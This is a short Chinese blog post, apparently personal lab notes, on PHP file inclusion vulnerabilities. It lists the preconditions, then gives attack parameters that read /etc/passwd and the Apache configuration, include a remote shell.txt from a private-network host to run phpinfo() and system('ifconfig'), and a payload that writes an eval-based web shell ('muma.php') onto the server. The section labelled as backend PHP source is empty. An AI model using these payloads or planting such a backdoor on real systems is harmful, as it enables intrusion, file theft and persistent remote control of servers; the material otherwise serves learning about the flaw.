eveplw

导航

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

13.文件包含漏洞

1.后台PHP源码

 

2.利用条件

php.ini中allow_url_fopen=ON (默认开启)

用户参数可控且后台代码没有对包含的文件进行过滤

include函数会把任何后缀文件当成php执行

?filename=../SQL/common.php&username=admin&password=12345

?filename=/etc/passwd

?filename=/opt/lampp/etc/httpd.conf

 

3.远程文件包含

复制代码
# vim /opt/lampp/etc/php.ini

allow_url_include=ON(默认关闭)

?filename=http://192.168.19.130:8443/security/Upload/shell.txt&code=phpinfo();
?filename=http://192.168.19.130:8443/security/Upload/shell.txt&code=system("ifconfig");

可以写入木马后门程序
shell.txt:
file_put_contents("temp/muma.php",<?php @eval($_GET['code']); ?>)
复制代码

 

posted on   eveplw  阅读(56)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
点击右上角即可分享
微信分享提示